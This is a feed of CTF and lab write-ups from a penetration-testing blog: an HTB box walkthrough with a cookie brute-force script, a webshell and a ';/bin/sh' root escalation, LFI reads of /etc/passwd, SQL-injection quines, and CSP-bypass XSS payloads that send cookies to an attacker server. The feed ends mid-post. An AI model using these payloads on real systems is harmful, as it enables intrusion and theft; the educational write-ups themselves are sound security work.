tag:blogger.com,1999:blog-43856140921078662082024-03-14T18:25:10.673+08:00Kerz's Penetration Test.Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.comBlogger30125tag:blogger.com,1999:blog-4385614092107866208.post-11835495821809224272021-08-28T02:40:00.003+08:002021-08-31T11:14:44.242+08:00[HTB] OopsieI could see 2 opened ports which are port 22 and 80.<div><br /></div><div><div><span style="background-color: #fff2cc;">$ sudo nmap -PS -sS 10.10.10.28 -sC</span></div><div><br /></div><div>Nmap scan report for 10.10.10.28</div><div>Host is up (0.68s latency).</div><div>Not shown: 998 closed ports</div><div>PORT STATE SERVICE</div><div>22/tcp open ssh</div><div>| ssh-hostkey:</div><div>| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)</div><div>| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)</div><div>|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)</div><div>80/tcp open http</div><div>|_http-title: Welcome</div></div><div><br /></div><div><br /></div><div>There was not a login page, or no feature.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiSH7RzpYFyS-PNTkn3YXwCl_Ce-Ada_l2wV5utiW4S83lrX9I52BtwFphd6BwueoxLb_LLHkDe9yrw8oUdQN4QQJEN5azGurozMvPNc2UC1QRuTjTYTkC_10j_4jzf_bDkTDiMClcw9Q/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="328" data-original-width="766" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiSH7RzpYFyS-PNTkn3YXwCl_Ce-Ada_l2wV5utiW4S83lrX9I52BtwFphd6BwueoxLb_LLHkDe9yrw8oUdQN4QQJEN5azGurozMvPNc2UC1QRuTjTYTkC_10j_4jzf_bDkTDiMClcw9Q/w469-h201/image.png" width="469" /></a></div><br />There was another directory with view-source.</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHtDkLkOB1QuBlTGnPkdsL8FIsoyJS2ObcpcoAlKRcZOPA87yd1RnrKmXOPQciVBfCpqZVVmp7oKDn_maHX2hVzujQefLT9tQXzddMqQ2LmtxkYmiuKbwSKCInpRZbvYVyIJ9KWHxSNYA/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="99" data-original-width="388" height="82" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHtDkLkOB1QuBlTGnPkdsL8FIsoyJS2ObcpcoAlKRcZOPA87yd1RnrKmXOPQciVBfCpqZVVmp7oKDn_maHX2hVzujQefLT9tQXzddMqQ2LmtxkYmiuKbwSKCInpRZbvYVyIJ9KWHxSNYA/" width="320" /></a></div><br /><br /></div><div>I could found 2 important information.</div><div>1. /cdn-cgi/login/login.php</div><div>2. /uploads/</div><div><br /></div><div>I should keep the 2nd directory information, it will be useful information later.</div><div><br /></div><div>I could see a login page.</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlCQHZRaI4t18wVSyNjGQu2c2JEANNMHrKbKKEBcvxGmO45D38hW8oI4Yfuhku-p46ACGUiFCDF7WTjdWNyyg295pT38VjfhpUP9jSYLPk8FiSTxFvFTVe5QmrOzWLeEYr7iF9YhvjOAk/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="435" data-original-width="421" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlCQHZRaI4t18wVSyNjGQu2c2JEANNMHrKbKKEBcvxGmO45D38hW8oI4Yfuhku-p46ACGUiFCDF7WTjdWNyyg295pT38VjfhpUP9jSYLPk8FiSTxFvFTVe5QmrOzWLeEYr7iF9YhvjOAk/" width="232" /></a></div><br />The account was admin and password was "MEGACORP_4dm1n!!". The password was from the previous box.<br /></div><div><br /></div><div>I could see some menus and my cookie. The cookie was "user=34322; role=admin".</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnJTL2L27n9ixrEu2pseVgYbgAElTwfYJ_YXeIWN8P1mmHYCpBZZ1aGVE0UIKcJo5f66FCR8yayKkhbZMsKMwAXNaGYsxtf-ryerlZLmVKlqgN7Nw8CcEAVls_upspktj7btjOXVf2jsY/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="245" data-original-width="276" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnJTL2L27n9ixrEu2pseVgYbgAElTwfYJ_YXeIWN8P1mmHYCpBZZ1aGVE0UIKcJo5f66FCR8yayKkhbZMsKMwAXNaGYsxtf-ryerlZLmVKlqgN7Nw8CcEAVls_upspktj7btjOXVf2jsY/" width="270" /></a></div><br />The uploads menu showed an error message "This action require super admin rights".</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1a_e11icttqz4z3s2aE5eHhfeRmMpug569fgeWo-4-nt_SU13xK4xLWiseKj2PKOwZvKjeiO8bT1IPONajt4c9eqL3xd10iaHFojbC62vA4SpH0FFTi0g8zM9YNyySS44oXjJiYN4PXY/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="168" data-original-width="540" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1a_e11icttqz4z3s2aE5eHhfeRmMpug569fgeWo-4-nt_SU13xK4xLWiseKj2PKOwZvKjeiO8bT1IPONajt4c9eqL3xd10iaHFojbC62vA4SpH0FFTi0g8zM9YNyySS44oXjJiYN4PXY/" width="320" /></a></div><br /><br /></div><div>So, I should gain the super admin right. I changed the user number of the cookie.</div><div><br /></div><div><pre><code class="python" lang="python">import requests
from bs4 import BeautifulSoup
def exp():
host, port = "http://10.10.10.28", 80
for i in range(86574, 100000):
cookies = {
"user":str(i),
"role":"admin"
}
r = requests.get(host+"/cdn-cgi/login/admin.php?content=uploads", cookies=cookies)
if "Authenticating" not in r.text:
print(f"Found: {str(i)}")
exit()
if __name__ == "__main__":
exp()
</code></pre></div><div><br /></div><div>I found the user number to access the uploads menu.</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-1MwGuImkiPEKFuVNc8yXPr5riSdafHh9RvIj1qulbEar_LfzxEsRerjZ5A9t3p8_UOzLG3juecE43Q3tUH1z6_ukpKpsle9hki0_7p9MMvWZWL22SO6TZy9H_GLQtqg_7xDQlP4qtKg/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="24" data-original-width="110" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-1MwGuImkiPEKFuVNc8yXPr5riSdafHh9RvIj1qulbEar_LfzxEsRerjZ5A9t3p8_UOzLG3juecE43Q3tUH1z6_ukpKpsle9hki0_7p9MMvWZWL22SO6TZy9H_GLQtqg_7xDQlP4qtKg/w198-h43/image.png" width="198" /></a></div><br />I generated a webshell using weevely.</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKLdEuOTaeU5TGNCJHRUs6tp09b_mHATqtB4G3P0Z25Jwfy9KHHFCZzqSvEKeMJi1icANFEpM8boTBezKM2_MzvEQFhVG2b-eURrhH3h9HsCO7L-U_Pr_2H5wpFJGkHfRvAeNYNlimGRU/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="56" data-original-width="286" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKLdEuOTaeU5TGNCJHRUs6tp09b_mHATqtB4G3P0Z25Jwfy9KHHFCZzqSvEKeMJi1icANFEpM8boTBezKM2_MzvEQFhVG2b-eURrhH3h9HsCO7L-U_Pr_2H5wpFJGkHfRvAeNYNlimGRU/" width="320" /></a></div><br />There was a user account and password.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2E1ihD1ZK0u9pwewZPCxmuJcFMUV8r520ucg5G2uz1gOmoMHuo-AyVS9QRBphwlYMv_4qXagEHf5s8SU9lyJWe7aw-V2QLNo_E9p1tRe8EOvyFFoY3eCeg0kvrC6tCfIvhR8NegIhrbQ/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="59" data-original-width="391" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2E1ihD1ZK0u9pwewZPCxmuJcFMUV8r520ucg5G2uz1gOmoMHuo-AyVS9QRBphwlYMv_4qXagEHf5s8SU9lyJWe7aw-V2QLNo_E9p1tRe8EOvyFFoY3eCeg0kvrC6tCfIvhR8NegIhrbQ/" width="320" /></a></div><br />I could access the box with SSH with the robert's credentials. I got the user flag.</div><div><br /></div><div>Next, I should gain a root permission. I looked forward other vulnerabilities.</div><div><br /></div><div>After few mintues, I checked a suspicous group name "bugtracker".</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoE3XDgtFhAdnY6nwA038VlZJMTP6DAap0XFsl2hWWRoTM7oblTF6eDik_PZYCobvgfD2rs1JaeLkIH0kvO-rwTNAlgWaqUiXdCS9XYpx_aYWBtPeNd3_43NQ6zegXQqGR46ReRw66wuo/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="36" data-original-width="575" height="20" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoE3XDgtFhAdnY6nwA038VlZJMTP6DAap0XFsl2hWWRoTM7oblTF6eDik_PZYCobvgfD2rs1JaeLkIH0kvO-rwTNAlgWaqUiXdCS9XYpx_aYWBtPeNd3_43NQ6zegXQqGR46ReRw66wuo/" width="320" /></a></div><br />I found the suspicous binary /usr/bin/bugtracker.</div><div>- <span style="background-color: #fff2cc;">find / -type f -group kali 2>/dev/null</span></div><div><br /></div><div>It runs with root permission.</div><div><br /></div><div>I got the root permission after I put "<span style="background-color: #fff2cc;">;/bin/sh</span>".</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbZcN7CDvd1JesduV69Qt9cE0Gy4rxe29DcjqIf2ijG14OsB_vDaNU9uyGiSiS8TCNCsp_UTM1poTII1aEsNx-Ed3jydma8c6w5U5GWZizv-X1e1csOqPbjLs4mkR0_sJt170VPAXr2OA/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="306" data-original-width="289" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbZcN7CDvd1JesduV69Qt9cE0Gy4rxe29DcjqIf2ijG14OsB_vDaNU9uyGiSiS8TCNCsp_UTM1poTII1aEsNx-Ed3jydma8c6w5U5GWZizv-X1e1csOqPbjLs4mkR0_sJt170VPAXr2OA/" width="227" /></a></div><br /><br /></div><div>END</div><div><br /></div>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-51698582421190880732021-08-25T09:45:00.020+08:002021-08-31T11:14:32.925+08:00Andorid Mobile App Assessment - Frida environment<p>This is how to implement test environment for Frida.</p><p>Below is my test environment for frida-server and frida-client:</p><p>|----------------------------------------------------------------------------------|</p><p>| |-------------------------| |------------------------------------| |</p><p>| | Android-Studio | | Ubuntu on VM Player | |</p><p>| | AVD | <---> | IP: 192.168.172.129 (NAT) | |<br /></p><p>| | IP: 10.0.2.2 (NAT) | |------------------------------------| |</p><p>| |-------------------------| |</p><p>| Windows 10 |</p><p>| 192.168.1.101 |</p><p>|----------------------------------------------------------------------------------|</p><p><br /></p><p>That's a simple test environment.</p><p>The <a href="https://github.com/frida/frida/releases" target="_blank">frida-server</a> is running on Android-Stuido AVD, and the <a href="https://github.com/frida/frida" target="_blank">frida-tools</a> is running on the Ubuntu server.</p><br /><br />Windows & AVD<br />1. copy the frida-server file to Android (/data/local/tmp).<br />1.1. <span style="background-color: #fff2cc;">adb.exe push /<your-path of frida-server file> /data/local/tmp/</span><div><br /><div>2. go adb shell and run frida on AVD<br />2.1. <span style="background-color: #fff2cc;">adb shell; cd /data/local/tmp; chmod 755 ./frida-server; ./frida-server</span><br /></div></div><div><br /></div><div>Windows</div><div>3. adb forward port</div><div>3.1. <span style="background-color: #fff2cc;">.\adb.exe forward tcp:27042 tcp:27042</span></div><div>3.2. <span style="background-color: #fff2cc;">.\adb.exe forward tcp:27043 tcp:27043</span></div><div>3.3. then, it will forward the ports, but it listen for 127.0.0.1 only. </div><div><br /></div><div>4.Windws forward port</div><div>4.1. <span style="background-color: #fff2cc;">netsh interface portproxy add v4tov4 listenport=27044 listenaddress=0.0.0.0 connectport=27042 connectaddress=127.0.0.1</span></div><div>4.2. <span style="background-color: #fff2cc;">netsh interface portproxy add v4tov4 listenport=27045 listenaddress=0.0.0.0 connectport=27043 connectaddress=127.0.0.1</span></div><div>4.3. <span style="background-color: #fff2cc;">netsh interface portproxy show all</span></div><div>4.4. then, it will forward the ports, but it listen for 0.0.0.0.</div><div><div><br /></div><div>---------------------------------------------------------------------------------------------------------------|</div><div>| |---------------------------| |-------------| |</div><div>| | listening 27042 | --- 127.0.0.1:27042 ---> | <--- 0.0.0.0:27044 --- | frida-ps | |</div><div>| | listening 27043 | --- 127.0.0.1:27043 ---> | <--- 0.0.0.0:27045 --- | | |</div><div>| |--------------AVD-------| |--Ubuntu -| |</div><div>| |</div><div>|----------------------------------------------------------------------------------------Windows ----------|</div><div><br /></div><div>Ubuntu</div><div>5. Connect to frida-server</div><div>5.1 <span style="background-color: #fff2cc;">frida-ps -H 192.168.1.101:27044</span></div></div><div><br /></div><div><br /></div><div>[Extra tips]</div><div>adb.exe logcat</div><div><br /></div><div><br /></div><div><br /></div>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-79797866497382925092021-08-24T17:42:00.003+08:002021-08-24T17:43:00.480+08:00corCTF - writeup for crypto/fibinaryIt is a simple crypto chall. <div><br /></div><div>It provides below code and encrypted flag:
</div><div><br /></div><div>enc.py</div><div><br /></div><div><div>fib = [1, 1]</div><div>for i in range(2, 11):</div><div> fib.append(fib[i - 1] + fib[i - 2])</div><div><br /></div><div>def c2f(c):</div><div> n = ord(c)</div><div> b = ''</div><div> for i in range(10, -1, -1):</div><div> if n >= fib[i]:</div><div> n -= fib[i]</div><div> b += '1'</div><div> else:</div><div> b += '0'</div><div> return b</div><div><br /></div><div>flag = open('flag.txt', 'r').read()</div><div>enc = ''</div><div>for c in flag:</div><div> enc += c2f(c) + ' '</div><div>with open('flag.enc', 'w') as f:</div><div> f.write(enc.strip()) </div></div><div><br /></div><div>flag.enc</div><div><br /></div><div>10000100100 10010000010 10010001010 10000100100 10010010010 10001000000 10100000000 10000100010 00101010000 10010010000 00101001010 10000101000 10000010010 00101010000 10010000000 10000101000 10000010010 10001000000 00101000100 10000100010 10010000100 00010101010 00101000100 00101000100 00101001010 10000101000 10100000100 00000100100 </div><div><br /></div><div>I made simple brute-force code to decrypt the encrypted flag.</div><div><br /></div><div>dec.py</div><div><div>fib = [1, 1]</div><div>for i in range(2, 11):</div><div> fib.append(fib[i - 1] + fib[i - 2])</div><div><br /></div><div>def c2f(c):</div><div> n = ord(c)</div><div> b = ''</div><div> for i in range(10, -1, -1):</div><div> if n >= fib[i]:</div><div> n -= fib[i]</div><div> b += '1'</div><div> else:</div><div> b += '0'</div><div> return b</div><div><br /></div><div><br /></div><div>flag_enc = open('flag.enc', 'r').read()</div><div><br /></div><div>dec = ''</div><div>for flag_blk in flag_enc.split(' '):</div><div> for c in range(0,127):</div><div> if c2f(chr(c)) == flag_blk:</div><div> dec += chr(c)</div><div>print(dec)</div></div><div><br /></div><div><br /></div><div>Flag:</div><div><div>corctf{b4s3d_4nd_f1bp!113d}</div></div><div><br /></div>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-69462214327588861922021-07-23T07:04:00.004+08:002021-07-23T07:07:32.730+08:00Quine sql Injection <div>What is Quine? let's refer to <a href="https://en.wikipedia.org/wiki/Quine_(computing)" rel="nofollow" target="_blank">Wiki</a>.</div><link href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/styles/androidstudio.min.css" rel="stylesheet"></link>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script><div><br /></div><blockquote><div>A quine is a computer program which takes no input and produces a copy of its own source code as its only output. The standard terms for these programs in the computability theory and computer science literature are self-replicating programs,self-reproducing programs, and self-copying programs</div></blockquote><div><br /></div><div>There is good example wargame problem which is ouroboros golf of <a href="http://Webhacking.kr">Webhacking.kr</a>.</div><div><br /></div><div>Below is the problem code:</div><pre><code class="language-php"><?php
include "../../config.php";
login_chk();
print_best_golfer(73);
$db = dbconnect("ouroboros");
if(preg_match("/\./i", $_GET['pw'])) exit("No Hack ~_~");
$query = "select pw from prob_ouroboros where pw='{$_GET['pw']}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['pw']) echo "<h2>Pw : {$result['pw']}</h2>";
if(($result['pw']) && ($result['pw'] === $_GET['pw'])){
// !!THIS IS PAYLOAD GOLF CHALLENGE!!
// My solution of ouroboros golf is 210byte.
// If your solution is shorter than mine, you will get 5 point per 1 byte.
$len = 210 - strlen($_GET['pw']);
if($len > 0){
solve(73,$len * 5);
}
else{
echo "<h2>nice try :)</h2>";
}
}
highlight_file(__FILE__);
?></code></pre><br /><div>I should inject a SQL query, it will be $_GET['pw']. and the SQL query will run to DB, and return the result as per the code $result['pw'].</div><div><br /></div><div>Next, the $reuslt['pw'] should be exist and same as my input. ($result['pw'] === $_GET['pw']).</div><div><br /></div><div>Last, the payload should be less than 210 lengths.</div><div><br /></div><div>Now, it sounds like time to make a Quine Generator for SQL. We can use replacement mothod, indirect ($) replacement method and union select.</div><div><br /></div><div>We can pseudocode the simple replacement as follow:</div><pre><code class="plaintext">'union+select+replace(replace('"union+select+replace(replace("$",char(34),char(39)),char(36),"$")as+a%23',char(34),char(39)),char(36),'"union+select+replace(replace("$",char(34),char(39)),char(36)"$")as+a%23')as+a%23</code></pre><br />It makes same $result['pw'] and $_GET['pw']. You could reduce the length. For your Quine practice, I don't put a correct answer here.<div><br /></div><div>END</div>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-13189591820871545152021-07-13T14:09:00.007+08:002021-07-23T10:29:50.738+08:00Android Reverse Engineering and modifying apk.<p>When to conduct penetration tests about Android applications, this is a small piece to help you.</p><p>It is easy to decompile and repack android apps (apk). </p><p>The following list describes some android terms:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><p style="text-align: left;"></p></blockquote><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"></blockquote><ul style="text-align: left;"><li>Smali disassembled Java opcodes in textual format generated by baksmali, a DEX
format disassembler</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://miro.medium.com/max/2400/1*lH0ViR8YZ1l-G5nZEJMi0A.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="197" data-original-width="800" height="153" src="https://miro.medium.com/max/2400/1*lH0ViR8YZ1l-G5nZEJMi0A.png" width="623" /></a></div><div><br /></div><ul style="text-align: left;"><li>App Manifest: XML file that provides essential app information</li></ul><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><p></p></blockquote><p>Basic static analysis provides a general understanding of the mobile application's structure. the apktool can help to decompile the app's resources.</p><code class="plaintext">$apktool d -o ./sample sample.apk</code><p>The apk could contains meta information in AndroidManifest.xml file, and other files as per below:</p><p></p><ul style="text-align: left;"><li>AndroidManifest.xml</li><li>classes.dex</li><li>res/</li><li>lib/</li><li>META-INF</li></ul><div><br /></div><div>We could update source codes on in the disassembled class files (smali).</div><div><br /></div><div>There are few methods to update smali files.</div><div><ul style="text-align: left;"><li>Manually add/edit/remove smali code. We should learn about smali code. This <a href="https://www.programmersought.com/article/94154023223/" target="_blank">URL</a> may be useful. In this case, JD GUI and jadx-gui are useful tools.</li><li>You build new android app with your android java code, and disassemble the apk to extract the smali code.</li></ul></div><p></p><p>After update the smali code, you could build an updated apk using apktool.</p><pre><code class="plaintext">$apktool b -o sample_new.apk ./sample</code></pre><p>Next, we could create key and sign.</p><pre><code class="plaintext">$keytool -genkey -v -keystore resign.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
$jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore resign.keystore sample_new.apk alias_name
</code></pre><p><br /></p><p>If you know how to use smali language, you can modify apk much easier.</p><p><br /></p><p>Reference:</p><p>1. OWASP MASVS - https://github.com/OWASP/owasp-masvs/releases/</p>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-52154206048021618952021-04-24T07:17:00.004+08:002021-04-24T07:22:51.269+08:00CSP bypass with wargame<link href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/styles/androidstudio.min.css" rel="stylesheet"></link>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
What is Content-Security-Policy (CSP)?<br /><br />Conent Security Policy (CSP) is an added security layer that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injectino attacks.<br /><br />However, it could be unsafe if there is wrong CSP configuration.<div><br /></div><div>Below is a sample unsafe scenarios with wargame probs.</div><div><br /></div><div>#1. Bypass CSP script-src 'nonce-random'.</div><div><br /></div><div>First prob, there is CSP with script-src 'nonce-random' in HTTP header.</div><div><pre><code class="plaintext">HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 22:01:38 GMT
Server: Apache/2.4.29 (Ubuntu)
<span style="background-color: #fcff01;">Content-Security-Policy: script-src 'nonce-uMiBg4W3wGgp8JQnJG2TL7WLGE8=';
</span>Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 133
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8</code></pre>
I tried CSS brute-force attack to take the nonce-random value, however, it did not work. I looked again source code of the prob. There was loaded internal script file "script.js" as per below:</div><pre><code class="html"><h2>you can inject anything</h2>
<div id="injected">
foo
</div>
<script nonce="" src="/script.js" umibg4w3wggp8jqnjg2tl7wlge8=""></script>
</code></pre><div>Yes! now I have a chance to load the script.js file from my server using <base> tag. It is because the CSP does not include base-uri.</div><div><br /></div><div>I can steal an admin cookie with this Payload:</div><div><pre><code class="html"><base href='http://[my server IP]/'></code></pre></div><div><br /></div><div>script.js in my server</div><div><pre><code class="javascript">location.href='http://[my server IP]'+cookie;</code></pre></div><div><br /></div><div>#2. Bypass CSP script-src "https://*.google.com"</div><div><br /></div><div>Secode prob, there is CSP with script-src 'https://*.google.com'.</div><div><br /></div><div><div><pre><code class="html">HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 22:52:02 GMT
Server: Apache/2.4.29 (Ubuntu)
<span style="background-color: #fcff01;">Content-Security-Policy: script-src https://*.google.com/;
</span>Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 90
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8</code></pre></div><div>It allowed only google. Many websites use Google's API a lot. And Google always overlooks being safe. This problem is probably the wrong CSP setting, which can be seen a lot.</div><div><br /></div><div>I bypassed this CSP with this payload:</div><div><pre><code class="html"><script src=https://accounts.google.com/o/oauth2/revoke?callback=var/**/a%3d%27http://[my server ip]%27;location.replace(a%252bcookie);></script></code></pre></div><div>As the payload, this vulnerability is using json callback on google.com.</div><div><br /></div><div>How to mitigate this problem? It could solve to allow specific url for CSP. For example, script-src https://apis.google.com</div><div><br /></div><div>~ kerz</div><div><br /></div><div>Reference:</div><div>Conent Security Policy (CSP): https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP</div><div>Secure CSP: https://developers.google.com/web/fundamentals/security/csp</div>
</div>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-21449518576382774312020-01-07T01:19:00.002+08:002020-01-07T01:27:28.099+08:00WhiteHat Grand Prix 06 – Quals, CTF writeup, Web Security 1<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHDDHVHxPbKTIWQyHeAGErRzx8-Vzdclg9lZNNaBCNwo_pMQSolJ-FQSzlwF_d7b8nZ6KFucCI3rU6kOLDZHsVa006NWZ2ZlZTflcIXVgjAH8lu3xd7sq7o94L_qljewOrS08Rvyr-mFY/s1600/Screenshot+2020-01-07+at+12.38.51+AM.png"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHDDHVHxPbKTIWQyHeAGErRzx8-Vzdclg9lZNNaBCNwo_pMQSolJ-FQSzlwF_d7b8nZ6KFucCI3rU6kOLDZHsVa006NWZ2ZlZTflcIXVgjAH8lu3xd7sq7o94L_qljewOrS08Rvyr-mFY/s640/Screenshot+2020-01-07+at+12.38.51+AM.png" width="640" /></a><br />
<br />
<br />
In the task, I got a website with register, login, logout forms. The web site redirected to:<br />
<br />
<ul>
<li>http://15.165.80.50/?page=login </li>
<li>http://15.165.80.50/?page=logout </li>
</ul>
<br />
After a while I figured out that the <span style="color: blue;"><i>page</i></span> parameter's value was <i>vulnerable</i>, which I was able to read local files using php wrapper LFI. For example:<br />
<br />
<ul>
<li>http://15.165.80.50/?page=<span style="color: blue;">php://filter/convert.base64-encode/resource=/etc/passwd </span></li>
</ul>
<br />
I used the above payload to read the website's files such as index.php, however, it did not work. I wasted my time guessing the path and file name of the web files and a flag.<br />
<br />
I checked some files to gain some information in <i><span style="color: blue;">/proc</span></i> and other directories. The flag was in <i><span style="color: blue;">/proc/1/cmdline</span></i>.<br />
<div>
<br /></div>
<div>
$ curl http://15.165.80.50/?page=php://filter/convert.base64-encode/resource=/proc/1/cmdline -o a.txt</div>
<div>
$ cat a.txt</div>
<div>
<br />
<!DOCTYPE html><br />
<html lang="en"><br />
<head><br />
<title>My Viet Nam</title><br />
<meta charset="utf-8"><br />
<meta name="viewport" content="width=device-width, initial-scale=1"><br />
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/css/bootstrap.min.css"><br />
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script><br />
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min.js"></script><br />
<style type="text/css"><br />
body{ font: 14px sans-serif; }<br />
.wrapper{ width: 350px; padding: 20px; }<br />
</style><br />
</head><br />
<body><br />
<br />
<nav class="navbar navbar-inverse"><br />
<div class="container-fluid"><br />
<div class="navbar-header"><br />
<a class="navbar-brand" href="/">My Viet Nam</a><br />
</div><br />
<br />
<ul class="nav navbar-nav"><br />
<li class="active"><a href="/">Home</a></li><br />
</ul><br />
<ul class="nav navbar-nav navbar-right"><br />
<li><a href="?page=register"><span class="glyphicon glyphicon-user"></span> Register</a></li><br />
<ll><a href="?page=login"><span class="glyphicon glyphicon-log-in"></span> Login</a></li><br />
</ul><br />
</div><br />
</nav>/bin/bash/bin/start_service WhiteHat{Local_File_Inclusion_bad_enough_??}<br />
<br />
The flag was <span style="color: blue;">WhiteHat{Local_File_Inclusion_bad_enough_??}.</span><br />
<div style="background-color: white; box-sizing: inherit; color: #1d1c1d; counter-increment: snippet 1; font-family: Monaco, Menlo, Consolas, "Courier New", monospace; font-size: 13px; font-variant-ligatures: common-ligatures; margin-left: 32px; orphans: 2; padding: 0px 8px; position: relative; widows: 2;">
<pre style="--saf-0: rgba(var(--sk_foreground_low,29,28,29),0.13); background-color: transparent; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border-width: 0px; box-sizing: inherit; color: inherit; font-family: inherit; font-size: inherit; font-variant-ligatures: contextual; line-height: inherit; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; tab-size: 4; white-space: pre-wrap; word-break: normal; z-index: 2;"></pre>
</div>
</div>
<div>
<br /></div>
Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com2tag:blogger.com,1999:blog-4385614092107866208.post-33599018134289851972019-04-15T17:00:00.000+08:002020-01-07T01:57:41.686+08:00PlaidCTF 2019 - Triggered (Web)I was not able to solve this problem on the contest time. Someone posted hint on Twitter <a href="https://twitter.com/gP4yload/status/1117607002354540544" target="_blank">Link#</a>, I solved as per his poster, but he did not post with detail information. Therefore, I wrote code and found a flag as per below: <br />
<br />
<u>Problem Description</u><br />
<br />
Triggered - Web (280 pts)<br />
<br />
I stared into the abyss of microservices, and it stared back. I found something utterly terrifying about the chaos of connections. <br />
<br />
"Screw this," I finally declared, "why have multiple services when the database can do everything just fine on its own?" <br />
<br />
And so on that glorious day it came to be that everything ran in <a href="http://triggered.pwni.ng:52856/">plpgsql</a>.<br />
<br />
<u>Write up</u><br />
<br />
Below codes should run at same time due to race condition exploit.<br />
<br />
First Code: <br />
